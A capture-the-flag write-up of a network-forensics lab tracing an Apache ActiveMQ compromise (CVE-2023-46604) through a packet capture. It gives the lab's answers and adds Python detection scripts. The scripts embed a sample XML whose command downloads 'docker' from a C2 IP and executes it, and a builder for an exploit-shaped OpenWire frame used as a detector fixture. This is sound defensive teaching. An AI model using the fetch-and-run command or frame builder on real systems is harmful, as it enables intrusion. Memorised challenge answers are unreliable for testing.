# OpenWire Lab (CyberDefenders) by 0xF4y3d

![0xF4y3d](https://hackmd.io/_uploads/SkV--g1aC.png =200x)

- [Introduction](#Introduction)
- [Challenge](#Challenge)
- [Steps](#Steps)
- [Conclusion](#Conclusion)

## Introduction

:::info
This lab is aimed at anyone interested in network forensics with Wireshark. It walks you from a packet capture to a **CVE** and the root cause behind it.
:::

## Challenge

:::info
https://cyberdefenders.org/blueteam-ctf-challenges/openwire/
:::

:::warning
**Instructions:** Uncompress the lab (pass: cyberdefenders.org)

**Scenario:** During your shift as a tier-2 SOC analyst, you receive an escalation from a tier-1 analyst regarding a public-facing server. This server has been flagged for making outbound connections to multiple suspicious IPs. In response, you initiate the standard incident response protocol, which includes isolating the server from the network to prevent potential lateral movement or data exfiltration and obtaining a packet capture from the NSM utility for analysis. Your task is to analyze the pcap and assess for signs of malicious activity.

**Tools:** Wireshark
:::

## Steps

- [Q1](#Q1)
- [Q2](#Q2)
- [Q3](#Q3)
- [Q4](#Q4)
- [Q5](#Q5)
- [Q6](#Q6)
- [Q7](#Q7)
- [Q8](#Q8)

Before touching any question, let's do the routine first pass on a capture: find out which IPs are involved, decide what to filter on, and form a first opinion about what looks normal and what does not.

1. Go to **Statistics -> Conversations**

![image](https://hackmd.io/_uploads/SJVE4fm3R.png)

Four IPs appear:

- 84.239.49.16
- 134.209.197.3
- 128.199.52.72
- 146.190.21.92

What can we infer from these conversations?

:::spoiler
1. The scenario tells us that our server has already been isolated.
2. 134.209.197.3 takes part in every conversation in the capture, so it is almost certainly our server.
3. Looking at the byte counts, there is a large transfer of roughly 5 MB from 146.190.21.92 to our server. <font color="#f00">SUS</font>!
   This could well be a malicious file being pushed to our server.
:::

2. Go to **Statistics -> Protocol Hierarchy**

![image](https://hackmd.io/_uploads/rJukUGm30.png)

Interesting: there are malformed packets under TCP, and some of them belong to a protocol Wireshark labels <font color="#f00">OpenWire</font>. That could mean many things, so let's first find out what OpenWire actually is.

:::info
A quick way to get oriented is to ask ChatGPT "What is the OpenWire protocol?"; the gist of the answer is below.
:::

:::warning
OpenWire is the native wire-level protocol that Apache ActiveMQ, a widely used open-source message broker, speaks between clients and brokers. It is a binary protocol designed for efficient, high-performance and reliable messaging.
:::

So we now know it is the messaging protocol spoken by our server, and at least one packet of it is malformed. A Wireshark dissector marks a packet as malformed when the bytes do not fit the field layout it expects, which is exactly what a hand-crafted frame sent by an exploit tends to look like.

PS: It is often worth applying the "Data" entry of the protocol hierarchy as a filter and reading through what is left, but in this challenge that did not turn up anything useful for me.

### <font color="#AC19C9">Q1</font>

> By identifying the C2 IP, we can block traffic to and from this IP, helping to contain the breach and prevent further data exfiltration or command execution. Can you provide the IP of the C2 server that communicated with our server?

Let's take a look at the capture:

![image](https://hackmd.io/_uploads/BkKu9zXhA.png)

Inspecting the malformed packet tells us what it is meant to do:

![image](https://hackmd.io/_uploads/SyHZjfmnA.png)

It carries an exception section whose message field points at an XML file hosted on <font color="#f00">146.190.21.92</font>. A legitimate OpenWire exception response carries an error message, not a URL, so this alone is enough to mark that host as the C2 server.

:::spoiler
**Answer: 146.190.21.92**
:::

Great, on to the next question.

### <font color="#AC19C9">Q2</font>

> Initial entry points are critical to trace back the attack vector.
> What is the port number of the service the adversary exploited?

That one is easy: it is the destination port on our server that the attacker connected to and sent the malformed packet to, <font color="#f00">61616</font>, which is also the default port on which ActiveMQ listens for OpenWire connections.

:::spoiler
**Answer: 61616**
:::

### <font color="#AC19C9">Q3</font>

> Following up on the previous question, what is the name of the service found to be vulnerable?

From the protocol hierarchy and the description of OpenWire above, we know the protocol belongs to <font color="#f00">Apache ActiveMQ</font>, so that is the vulnerable service.

:::spoiler
**Answer: Apache ActiveMQ**
:::

### <font color="#AC19C9">Q4</font>

> The attacker's infrastructure often involves multiple components. What is the IP of the second C2 server?

Remember the malformed packet we inspected? Let's go back to it:

![image](https://hackmd.io/_uploads/S1w5xQ730.png)

It references an XML file, and the server's request for that file, together with the response, can be found in the packets that follow:

![image](https://hackmd.io/_uploads/BJBk-mmnA.png)

Packet 14 carries the XML file itself:

![image](https://hackmd.io/_uploads/Sk97-7mnR.png)

As expected, it does something I would flag immediately: it curls a file called docker from <font color="#f00">128.199.52.72</font> and makes it executable. That settles it.

:::spoiler
**Answer: 128.199.52.72**
:::

A good exercise is also checking the XML file on VirusTotal.com. (I would not download it on my main host, only in a VM, and I most definitely would not double-click it XD.)

**And voila!**

![image](https://hackmd.io/_uploads/rJKKEQmnA.png)

It is not only flagged as malicious; the community comments tie it to a CVE from 2023.

### <font color="#AC19C9">Q5</font>

> Attackers usually leave traces on the disk. What is the name of the reverse shell executable dropped on the server?

We saw the XML curling a file called <font color="#f00">**docker**</font>, presumably named to blend in with legitimate software, and making it executable.
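The same XML can be triaged without clicking through it byte by byte in Wireshark. The following Python is an added example, not code from the lab, from this write-up or from ActiveMQ: it parses a Spring bean file constructed here to mirror the shape described above (a `java.lang.ProcessBuilder` bean wrapping a curl of `docker` from 128.199.52.72), lists the classes the file instantiates, and pulls out the download host and the name of the dropped file. The drop path `/tmp/docker` and the exact command line are assumptions made for the sample, not values taken from the capture.

```python
"""Triage a Spring bean XML of the kind fetched via CVE-2023-46604.
Added example, not code from the lab or from ActiveMQ. The sample XML is
constructed to mirror the structure described in the write-up; the drop
path /tmp/docker and the exact command line are assumptions."""
import posixpath
import re
import xml.etree.ElementTree as ET

BEANS_NS = "{http://www.springframework.org/schema/beans}"

# Classes whose instantiation means "run a command"; extend as needed.
EXEC_CLASSES = {"java.lang.ProcessBuilder", "java.lang.Runtime"}

# Constructed sample (not the file from the pcap): a ProcessBuilder bean whose
# constructor argument is the command line, started through init-method.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>bash</value>
        <value>-c</value>
        <value>curl -s http://128.199.52.72/docker -o /tmp/docker; chmod +x /tmp/docker; /tmp/docker</value>
      </list>
    </constructor-arg>
  </bean>
</beans>
"""

URL_HOST_RE = re.compile(r"https?://([^/\s:]+)")
# Paths that are written (curl -o / wget -O) or made executable (chmod +x).
DROP_RE = re.compile(r"(?:-[oO]|chmod\s+\+x)\s+(\S+)")


def extract_beans(xml_text):
    """Return one dict per <bean>: id, class, init-method and the string
    values passed to its constructor, in document order."""
    # ElementTree does not resolve external entities, but prefer defusedxml
    # for untrusted input in production; here the input is the analyst's copy.
    root = ET.fromstring(xml_text)
    beans = []
    for bean in root.iter(BEANS_NS + "bean"):
        args = [v.text or "" for v in bean.iter(BEANS_NS + "value")]
        beans.append({"id": bean.get("id"), "class": bean.get("class"),
                      "init_method": bean.get("init-method"), "args": args})
    return beans


def dropped_files(command):
    """Base names of the files the command writes to disk or marks executable."""
    paths = {p.rstrip(";") for p in DROP_RE.findall(command)}
    return sorted(posixpath.basename(p) for p in paths)


def triage(xml_text):
    """Flag beans that execute commands and summarise what each one does."""
    findings = []
    for bean in extract_beans(xml_text):
        if bean["class"] not in EXEC_CLASSES:
            continue
        command = " ".join(bean["args"])
        findings.append({
            "class": bean["class"],
            "command": command,
            "download_hosts": sorted(set(URL_HOST_RE.findall(command))),
            "dropped_files": dropped_files(command),
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_XML):
        print(finding)
```

Run it on the XML you export from Wireshark (File -> Export Objects -> HTTP) instead of `SAMPLE_XML`; the `download_hosts` list gives you the second C2 for Q4 and `dropped_files` the file name for Q5 in one pass.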
Checking the docker file on VirusTotal.com as well, we find this:

![image](https://hackmd.io/_uploads/SkTvUQX20.png)

Ooooh, that is a lot of detections XD, but it gives us what we wanted: this file is the malicious reverse shell executable.

:::spoiler
**Answer: docker**
:::

### <font color="#AC19C9">Q6</font>

> What Java class was invoked by the XML file to run the exploit?

An easy one. Back to the XML file:

![image](https://hackmd.io/_uploads/H19rwXmhA.png)

The bean definition names the class it instantiates right there: `java.lang.ProcessBuilder`, the JDK class that launches external processes, and the curl command we saw is what it is given to run.

:::spoiler
**Answer: java.lang.ProcessBuilder**
:::

### <font color="#AC19C9">Q7</font>

> To better understand the specific security flaw exploited, can you identify the CVE identifier associated with this vulnerability?

We already stumbled upon it when we uploaded the XML file to VirusTotal, remember? Here:

![image](https://hackmd.io/_uploads/ry9LOmm3A.png)

CVE-2023-46604. Let's search for it:

![image](https://hackmd.io/_uploads/HyGsum730.png)

That is it: CVE-2023-46604 is the remote code execution flaw in the OpenWire protocol of Apache ActiveMQ, fixed in versions 5.15.16, 5.16.7, 5.17.6 and 5.18.3.

:::spoiler
**Answer: CVE-2023-46604**
:::

### <font color="#AC19C9">Q8</font>

> What is the vulnerable Java method and class that allows an attacker to run arbitrary code? (Format: Class.Method)

The question asks for the specific class and method whose code makes this vulnerability possible. Searching for "CVE-2023-46604 exploit" and reading through some of the write-ups on it, I found this one:

https://www.trendmicro.com/en_us/research/23/k/cve-2023-46604-exploited-by-kinsing.html

Specifically:

![image](https://hackmd.io/_uploads/rJoNcQmhA.png)

From it we can identify the vulnerable method as <font color="#f00">createThrowable</font> in the `BaseDataStreamMarshaller` class. When the broker unmarshals an ExceptionResponse, this method takes the exception class name and message straight from the frame, loads the class by name and calls its constructor that takes a single String, passing the message. Nothing checks that the class is actually a Throwable, so any class on the broker's classpath with a String constructor can be instantiated. In this attack that class is Spring's ClassPathXmlApplicationContext, whose constructor loads the XML from the URL in the message, and that XML in turn creates the ProcessBuilder we saw in Q6. The fix adds a call to <font color="#f00">validateIsThrowable</font> to the body of createThrowable, which rejects any class that is not assignable to Throwable before the constructor is ever invoked.
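To make the chain from the malformed packet in Q1 to the missing check in Q8 concrete, here is an added example in Python; it is not code from the lab, from this write-up or from ActiveMQ. It decodes size-prefixed OpenWire frames in the loose encoding used by the public proof-of-concept, pulls the exception class name and message out of an ExceptionResponse (command type 31), and applies the policy the patch added: a class that is not a Throwable is rejected. A network sensor cannot load Java classes the way the broker does, so that check is approximated by a list of exception class names plus a name-suffix test. The sample frames are constructed here to the PoC layout; the XML file name `poc.xml` and the benign error text are assumptions, the lab's pcap has its own values.

```python
"""Decode OpenWire ExceptionResponse frames and flag the CVE-2023-46604
pattern. Added example; not code from the lab or from ActiveMQ. The sample
frames are constructed to the layout of the public PoC (loose encoding, no
WireFormatInfo handshake); the XML file name is an assumption."""
import re
import struct

EXCEPTION_RESPONSE = 31  # OpenWire command type of ExceptionResponse

# Exception classes a broker legitimately returns. A sensor cannot load
# classes like the broker does, so this list plus the suffix test in
# is_throwable() stands in for the Throwable check the patch added.
KNOWN_THROWABLES = {
    "java.lang.Throwable",
    "java.lang.SecurityException",
    "java.io.IOException",
    "javax.jms.JMSException",
    "javax.jms.JMSSecurityException",
    "javax.jms.InvalidClientIDException",
}
URL_RE = re.compile(r"https?://([^/\s:]+)")


def _loose_string(buf, pos):
    """Loose-encoded string: 1 presence byte, then Java writeUTF
    (2-byte big-endian length followed by that many UTF-8 bytes)."""
    if not buf[pos]:
        return None, pos + 1
    (length,) = struct.unpack_from(">H", buf, pos + 1)
    start = pos + 3
    return buf[start:start + length].decode("utf-8"), start + length


def parse_frames(stream):
    """Split a TCP payload into size-prefixed frames. ExceptionResponse
    frames get their class name and message decoded; other command types
    are reported by type only. Stops at a truncated trailing frame."""
    frames, pos = [], 0
    while pos + 4 <= len(stream):
        (size,) = struct.unpack_from(">I", stream, pos)
        body = stream[pos + 4:pos + 4 + size]
        if size == 0 or len(body) < size:
            break
        pos += 4 + size
        frame = {"type": body[0]}
        if body[0] == EXCEPTION_RESPONSE:
            # BaseCommand: commandId (int32), responseRequired (bool);
            # Response: correlationId (int32); then the marshalled Throwable.
            frame["command_id"], _, frame["correlation_id"] = struct.unpack_from(">IBI", body, 1)
            p = 10
            if body[p]:  # exception present
                frame["exception_class"], p = _loose_string(body, p + 1)
                frame["message"], p = _loose_string(body, p)
        frames.append(frame)
    return frames


def is_throwable(class_name):
    """Name-based stand-in for the validateIsThrowable check in the fix."""
    return class_name in KNOWN_THROWABLES or class_name.endswith(
        ("Exception", "Error", "Throwable"))


def flag_cve_2023_46604(frames):
    """Findings for ExceptionResponse frames that name a non-Throwable class
    or carry a URL in the message; either alone is suspicious."""
    findings = []
    for f in frames:
        cls = f.get("exception_class")
        if f["type"] != EXCEPTION_RESPONSE or cls is None:
            continue
        m = URL_RE.search(f.get("message") or "")
        if not is_throwable(cls) or m:
            findings.append({"class": cls, "url_host": m.group(1) if m else None})
    return findings


def build_exception_response(class_name, message):
    """Constructed fixture in the PoC layout; nothing here is sent anywhere."""
    def lstr(s):
        b = s.encode("utf-8")
        return b"\x01" + struct.pack(">H", len(b)) + b
    body = (bytes([EXCEPTION_RESPONSE]) + struct.pack(">IBI", 0, 0, 0)
            + b"\x01" + lstr(class_name) + lstr(message))
    return struct.pack(">I", len(body)) + body


# Constructed samples: the exploit frame as seen in Q1 (file name assumed)
# and a benign authentication failure of the kind a broker really returns.
EXPLOIT_FRAME = build_exception_response(
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "http://146.190.21.92/poc.xml")
BENIGN_FRAME = build_exception_response(
    "java.lang.SecurityException", "User name [admin] or password is invalid.")

if __name__ == "__main__":
    print(flag_cve_2023_46604(parse_frames(BENIGN_FRAME + EXPLOIT_FRAME)))
```

Feed `parse_frames` the reassembled TCP payload of the port 61616 stream (Follow -> TCP Stream, saved as raw) and the exploit frame from Q1 comes out flagged with its URL host, while the broker's own error responses pass; the suffix test is a heuristic, so an attacker who picks a gadget class whose name ends in "Exception" would still need the URL check to be caught.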
:::spoiler
**Answer: BaseDataStreamMarshaller.createThrowable**
:::

## Conclusion

Woaah, what a journey! That settles it for us 😊😊😊

Using Wireshark and a systematic pass over the captured traffic, we identified both C2 servers and the vulnerable service, recovered the dropped payload, and traced the attack back to the specific CVE and the code that made it possible. This exercise shows how much network forensics can tell you about an intrusion, and how that feeds straight into containment decisions such as which IPs to block and which service to patch.

I hope you found this walkthrough informative and engaging. If you have any questions or need further assistance, feel free to reach out. I'm always happy to help! 😊